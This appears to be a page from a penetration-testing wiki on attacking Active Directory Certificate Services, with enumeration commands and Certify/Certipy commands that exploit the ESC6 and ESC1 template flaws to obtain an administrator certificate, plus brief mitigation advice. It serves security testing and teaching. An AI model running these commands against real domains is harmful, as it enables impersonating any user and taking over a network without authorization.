Tactics, Techniques, and Procedures
Personal BlogTwitterGitHubContact
  • Tactics, Techniques, and Procedures
  • ☠️Pentesting
    • Fortress
      • Automation
      • Cisco
        • Cisco Adaptive Security Appliance
        • Cisco Smart Install
      • CMS
        • Drupal
        • Wordpress
      • Exchange
      • Office365
      • Okta
      • Outlook Web Access (OWA)
      • SSH
      • Subdomain Takeover
    • Infrastructure
      • Active Directory
        • AD CS
        • Coercing Authentication
        • Credential Dumping
          • Cached Domain Credentials
          • Data Protection API (DPAPI)
          • Group Policy Preferences
          • LSA Secrets
          • LSASS Memory
          • NTDS
          • Security Account Manager (SAM)
          • Kerberos Tickets
          • Unsecured Credentials
          • WDigest
          • WiFi Profiles
        • Delegation Abuse
          • Constrained Delegation
          • Unconstrained Delegation
        • Domain Enumeration
        • Domain Dominance
          • Forge Golden Ticket
          • Forge Silver Ticket
          • Forge Trust Ticket
          • Skeleton Key
        • Group Policy Preferences
        • Kerberos
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Relaying
        • Lateral Movement
          • PowerShell
          • Windows Remote Management (WinRM)
        • Local Administrator Password Solution (LAPS)
        • NoPac
        • NTLMv1
        • Password Cracking
        • Password Policy
        • Password Spraying
        • Reconnaissance
        • Relaying
          • LDAP Relaying
          • SMB Relaying
        • Shadow Credentials
        • Zerologon
      • Database Management System (DBMS)
        • Microsoft SQL Server
      • Defense Evasion
        • Disable or Modify Tools
        • Disable Windows Event Logging
        • Impair Command History Logging
        • Timestomping
      • Low-Hanging Fruit
      • Networks
        • IPv6
        • LLMNR/NBT-NS Poisoning
        • Network Scanning
        • Network Sniffing
        • Segmentation Testing
        • Simple Network Management Protocol (SNMP)
        • Subnet Enumeration
        • Identifying Domain Information
      • Persistence
        • Create Account
        • Remote Desktop
        • Services
          • Service Privilege Escalation / Persistence
          • Systemd Service Persistence
        • Web Shell
        • DLL Hijacking
      • Pivoting
      • Privilege Escalation
        • Linux
          • Setuid and Setgid
        • Windows
          • Privilege Abuse
            • SeImpersonatePrivilege
            • SeLoadDriverPrivilege
          • Service Exploitation
    • Initial Access
      • Phishing
        • Creating Templates
          • Leveraging AI During Template Creation
        • Payloads
          • Non-malicious Callback
          • Macros
    • OSINT
      • Identifying Users
      • Network Information
      • Search Engines
    • Web Applications
      • Access Control
      • APIs
        • Swagger API
      • Authentication
        • Account Takeover
      • Clickjacking
      • Cross Origin Resource Sharing (CORS)
      • Cross Site Request Forgery (CSRF)
      • Document Object Model (DOM)
      • File Upload
      • Google Dorking
      • GraphQL
      • HTTP Request Smuggling
      • Information Disclosure
      • Insecure Direct Object Reference (IDOR)
      • Injection Vulnerabilities
        • Cross-Site Scripting (XSS)
          • Blind Cross-Site Scripting
          • Finding Cross-Site Scripting
          • Stealing Cookies
          • XSS Payloads
        • CSV Injection
        • XML External Entity Injection (XXE)
        • LDAP Injection
        • NoSQL Injection
        • Server-Side Template Injection
        • SQL Injection
      • JSON Web Tokens (JWT)
      • Local File Inclusion (LFI)
      • OAuth
      • Open Redirection
      • Password Reset Poisoning
      • Prototype Pollution
      • Race Condition
      • Rate Limit Bypass
      • Remote Code Execution (RCE)
      • Remote File Inclusion (RFI)
      • Suspicious Parameters
      • Tooling
        • Burp Suite
          • Authentication / Proxy Issues
          • Intruder Attack Types
          • Match and Replace
          • Quality of Life
        • Misc Tooling
      • WAF Bypasses
      • WebSockets
      • Web Cache Deception
      • Web Cache Poisoning
    • Wireless
      • WPA / WPA2
        • Alfa Troubleshooting
        • Enterprise
        • Personal
    • Cloud
      • Amazon Web Services (AWS)
      • Microsoft Azure
  • 🧨Red Teaming
    • C2
      • Cobalt Strike
      • Empire
      • Metasploit
        • Metasploit Datatabase
      • Mythic
      • Sliver
    • Malware Dev
    • Offensive Infrastructure
      • Cloud Fronting
      • Redirectors
      • OpSec
      • Phishing Infrastructure
      • Creating a Dropbox
    • Offensive Tactics
    • Philosophy
  • 🦋Bug Bounty
    • Bug Bounty Tips & Tricks
  • 📖Resources
    • Blog Posts and Goodies
    • Checklists
    • Offensive Security Notes
    • Tooling Repository
    • Active Directory Toolkit
Powered by GitBook
On this page
  • Enumerate AD CS
  • Certutil
  • CrackMapExec
  • Certify
  • Exploitation
  • Exploiting ESC1
  • Mitigation
  • References
  1. Pentesting
  2. Infrastructure
  3. Active Directory

AD CS

PreviousActive DirectoryNextCoercing Authentication

Last updated 2 years ago

Active Directory Certificate Services (AD CS) is a feature of Active Directory that allows a desginated server to issue certificates. This assists in helping environments leverage and deploy the security advantages of using certificate-based authentication.

For a way more well explained blog on exploiting AD CS, I highly recommend checking out .

Additionally, notes from the are essential to understanding the attack chain of AD CS.

Enumerate AD CS

If we get a hit from these methods then we can browse to the host identified with the following URL: http://localhost/certsrv/

Certutil

Dump and display certification authority information with Certutil.exe. This utility can be used to quickly identify if there is a certificate authority on the domain for AD CS attacks:

Certutil -ping
Certutil.exe -tcainfo

CrackMapExec

crackmapexec smb $ip -u $username -p $password -M adcs

Certify

When dealing with AD CS, and are going to be your best friends.

# Identify and list vulnerable templates with Certipy
certipy find -u $username -p $password -dc-ip $dcip -vulnerable

# Identify and list vulnerable templates with Certify
Certify.exe find /vulnerable

Exploitation

The following section builds off of several available repositories that are referenced at the bottom of this page. There are multiple ways to exploit vulnerable certificate templates so I highly recommend searching through red team wikis and blogs to find one that may be specific for your use case.

EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6)

If this attribute is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.

The above quote from Microsoft in attacker-speak means that we can then enroll in any template configured for domain authentication that also allows unprivileged users to enroll. This would allow the attacker to obtain a certificate that then allows them to authenticate as any user/machine on the domain.

This setting is disabled by default.

# Find all enabled certificate templates:
Certify.exe find

# Abuse a cerificate with this setting configured 
Certify.exe request /ca:CA01.oasis.local\CorpCA /template:User /altname:$impersonateuser

Exploiting ESC1

## https://github.com/ly4k/Certipy
### It should be noted that information such as the CA, target, and template name can all be identified from running the certipy find command.

pip3 install certipy-ad
certipy find -u parz@oasis.local -p $password -dc-ip $dcip
certipy req -username parz@oasis.local -password $password -ca $ca -target $cahost -template $templatename -upn administrator@oasis.local -dns dc.oasis.local
certipy auth -pfx administrator_dc.pfx -dc-ip $dcip

Mitigation

One of the easiest ways to assist in detecting exploitation of AD CS is to enable Certificate Authority logging. By default, AD CS does not enable logging by default, which in the case of an incident will prevent an organization from responding. This can be easily remediated:

# Enable CA Logging
certutil.exe -setreg CA\AuditFilter 127

Additionally, it is recommended to perform regular auditing with tools such as Certify/Certipy or PSPKIAudit to detect vulnerable certificate templates:

References

This setting, like many others in this section can be discovered and exploited #through using .

☠️
SpecterOps' article
Relaying section
Ceritfy
Certipy
Certify
GitHub - GhostPack/PSPKIAudit: PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.GitHub
AD CS AbusePentester's Promiscuous Notebook
Certificate templatesThe Hacker Recipes
https://posts.specterops.io/certified-pre-owned-d95910965cd2posts.specterops.io
Logo
Securing PKI: Technical Controls for Securing PKIdocsmsft
Logo
Microsoft ADCS – Abusing PKI in Active Directory Environment - RiskInsightRiskInsight
Logo
Logo
Logo